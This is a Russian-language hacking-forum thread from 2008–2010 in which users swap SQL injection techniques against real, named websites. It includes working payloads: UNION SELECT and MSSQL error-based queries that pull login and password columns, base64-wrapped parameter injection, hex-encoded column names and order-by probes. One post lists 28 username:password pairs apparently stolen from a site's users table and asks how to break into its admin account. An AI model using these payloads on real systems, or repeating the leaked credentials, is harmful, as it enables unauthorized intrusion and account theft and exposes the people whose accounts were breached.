1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SQL непохек

Тема в разделе "Поиск уязвимостей", создана пользователем xeran, 1 сен 2008.

  1. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    bug1z,
    языки разные и только

    Добавлено через 9 минут
    Zik,
    но как сказал скай, это только в в таком типе
     
    Последнее редактирование: 14 фев 2009
    14 фев 2009
  2. NetSky
    NetSky адепт Модератор
    Симпатии:
    90
    ты возможно не так понял, там это дело уже закодировано, просто зайди на сам сайт, перейди во вкладку ньюз и глянь на параметр переменной, он закодирован в бас64, если раскодировать, получим переменные раздела новостей с параметрами, раскодировав параметр и подставив в уже пареметр закодированной переменной запрос, оказалось что там скуль... При которой свободно проходит вывод. То есть если у тебя есть сайт:
    Код:
    сайт.ком/скрипт.пхп?ид=1+ордер+бай+100--
    и при юнионе, например, фильтр, то кодировать, думаю что это понимаешь, запрос вот таким образом:
    Код:
    сайт.ком/скрипт.пхп?ид=тоже_самое_в_бас64...
    как минимум глупо, ибо в коде параметр не раскодируется...
    а в данном случае просто специфический момент...
    у нас есть
    Код:
    сайт.ком/скрипт.пхп?валью=бас64(где в бас64 закодированы переменная, скажем ид=1 и пэйдж=2)
    раскодировав бас64 в параметре переменной валью, получим только:
    Код:
    ид=1&пэйдж=2
    где уже подставляем запрос и кодируем все опять в бас64, а там подставляем в параметр валью...
    все в принципе просто, надеюсь что все это так и поняли...
     
    14 фев 2009
    1 человеку нравится это.
  3. Mei
    Mei bit of love Продвинутый
    Симпатии:
    214
    Код:
    http://home.vef.gov/news.php?id=-207
    Вводим любой запрос далее - сбрасывает на редирект.
     
    Последнее редактирование: 6 мар 2009
    6 мар 2009
  4. b3
    b3 Продвинутый
    Симпатии:
    16
    Мб потому что там нет скули? Проверять нужно 208-1, если выдаст то же что и 207 значит иньекция есть. В твоем случае там проверка на is_numeric()
     
    6 мар 2009
  5. xeran
    xeran Продвинутый
    Симпатии:
    46
    при запросе
    Код:
    sait.ru/?id=1693+union+select+1,2,3,4,5,6,7,8,9,10--
    ответ
    Код:
     ERROR:  UNION типы timestamp with time zone и integer не совпадают
    это значит юнион фильтруется?
     
    10 май 2009
  6. mg-el
    mg-el Продвинутый
    Симпатии:
    68
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 200 or greater.**
    убил кучу времени, но так и не наш0л в таблицах ниче путного, ток выяснил что админ - "root".
     
    15 май 2009
  7. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    241
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 100 or greater.**
    Добавлено через 5 минут
    http://xaker.name/forvb/showthread.php?t=14787 думаю энто тебе пригодится;)
     
    Последнее редактирование: 15 май 2009
    15 май 2009
    1 человеку нравится это.
  8. mg-el
    mg-el Продвинутый
    Симпатии:
    68
    Привет Всем.
    Столкнулся с такой проблемой:
    При запросе
    Выдает
    т.е. тут все норм

    далее
    ответ
    почему это происходит и как это обойти?
     
    21 май 2009
  9. Pin4eG
    Pin4eG Продвинутый
    Симпатии:
    33
    mg-el,
    попробуй заюзать вывод данных так:
    Код:
    _http://site.ru/index.asp?id=23+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)-- 
     
    24 май 2009
    1 человеку нравится это.
  10. xeran
    xeran Продвинутый
    Симпатии:
    46
    Добрового времени суток,
    сегодня столкнулся в первый раз с иньекцией в текст боксах(тобишь в логине и пароле). Подробно про это ни где на написано. Вот прошу помощи.
    ситуация такая при подстановке ' в поля логин и пароль выскакивает ошибка базы.
    На ордер+бай тоже ошибка. Реально ли что нибудь сделать?
     
    25 май 2009
  11. mg-el
    mg-el Продвинутый
    Симпатии:
    68
    доброго времени суток. Такая проблема.
    провожу мсскул иньекцию, все идет отлично, нахожу таблицу юзеров и начинаю просматривать названия колонок.
    первая - "id", вторая "Código". c этого момента и начинается проблема, когда я вставляю в запрос это "Código" у меня получается "C?digo", т.е. я так понимаю браузер не воспринимает этот символ.
    сайт вроде испанский.
    как это обойти? поможет ли мне смена браузера на испанский?
     
    26 авг 2009
  12. b3
    b3 Продвинутый
    Симпатии:
    16
    unhex(0x436F6469676F) - как то так, погугли =)
     
    26 авг 2009
    2 пользователям это понравилось.
  13. mg-el
    mg-el Продвинутый
    Симпатии:
    68
    вообщем походу я малость ошибся.
    при переборе столбцов в таблице - вылезает эта ошибка
    это вроде как означает что содержимое таблицы "закодировано".
    как это обойти? я так понимаю не совпадают типы данных.

    наверн надо чета с concat мутить((
     
    Последнее редактирование: 26 авг 2009
    26 авг 2009
  14. b3
    b3 Продвинутый
    Симпатии:
    16
  15. mg-el
    mg-el Продвинутый
    Симпатии:
    68
    b3,
    там ниче интересного нет.
     
    26 авг 2009
  16. Pin4eG
    Pin4eG Продвинутый
    Симпатии:
    33
  17. mg-el
    mg-el Продвинутый
    Симпатии:
    68
    Pin4eG,
    да, я уже это нашел.))
     
    26 авг 2009
    1 человеку нравится это.
  18. coolxack
    coolxack Новичок
    Симпатии:
    0
    люди, нужна Ваша помощь.
    С помощью этого запроса _http://www.aawow.info/question2.php?id=-31+union+select+concat_ws(0x3a,id,name,pass)+from+aawowinf_mrlink.users в тайтле виден логин;пасс (который странным образом не подходит в формочку на гл.страницы. Далее из таблицы users сиптом сливаю все логины;пассы

    [1]:1:MrLink:qazwsx
    [2]:2:admin:qazwsx
    [3]:3:administrator:qazwsx
    [4]:4:moderator:qazwsx
    [5]:5:qwerty:1234
    [6]:6:tristan:020285
    [7]:7:devil:662258
    [8]:8:xx-roker:509799
    [9]:9:Александр:208516
    [10]:10:Inv:681976
    [11]:11:kamols1:393033
    [12]:12:ALEXS:916286
    [13]:13:sergejr:glubokoe19
    [14]:14:aNgeL16:618484
    [15]:15:Bogdana:466490
    [16]:16:glvvodovozov:552331
    [17]:17:vskrom:665413
    [18]:18:михаил:979769
    [19]:19:Nata171:533898
    [20]:20:Loveegoist:1596321
    [21]:21:игорь:070447
    [22]:22:lativ2008:735208
    [23]:23:denistl:581017
    [24]:24:savca:426480
    [25]:25:NDB:14983
    [26]:26:eek:lga:471899
    [27]:27:eek:lishna:951181
    [28]:28:Ирина:165975


    но ни один пасс админов не подходит, так все таки как найти рабочий логин пасс админа?
    //не факт что именно в этой таблице учётка админа (hookman)
     
    Последнее редактирование модератором: 23 окт 2009
    27 авг 2009
  19. Dr. MefistO
    Dr. MefistO Крывіч Глобальный модератор
    Симпатии:
    123
    В СКУЛе только начал разбираться, и возникли вопросы:
    Имеется форма с полями login и password. Первое поле уязвимо. Выдает, что "Warning: mysql_num_rows()" при подстановке 1'.
    Пытаюсь подобрать столбцы, но не получается. Точнее не могу понять: нужно ли дописывать /* в конце при вводе текста в поле?
    [​IMG]
    А то, если оставлять второе поле пустым, ничего не происходит, но если его заполнить, то постоянно вылезает ошибка. Мне кажется, что второй параметр мешает запросу. Научите ламера...
     
    18 дек 2010
  20. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    241
    Желательно бы ссыль.

    Попробуй

    Код:
    1'+order+by+1--
    1'+order+by+111--
    
    1+order+by+1--
    1+order+by+111--
    
    1+order+by+1/*
    1+order+by+111/*
    
    1+and+0/*
    1+and+1/*
    
    1+and+1--
    1+and+0--
     
    19 дек 2010

Поделиться этой страницей

Загрузка...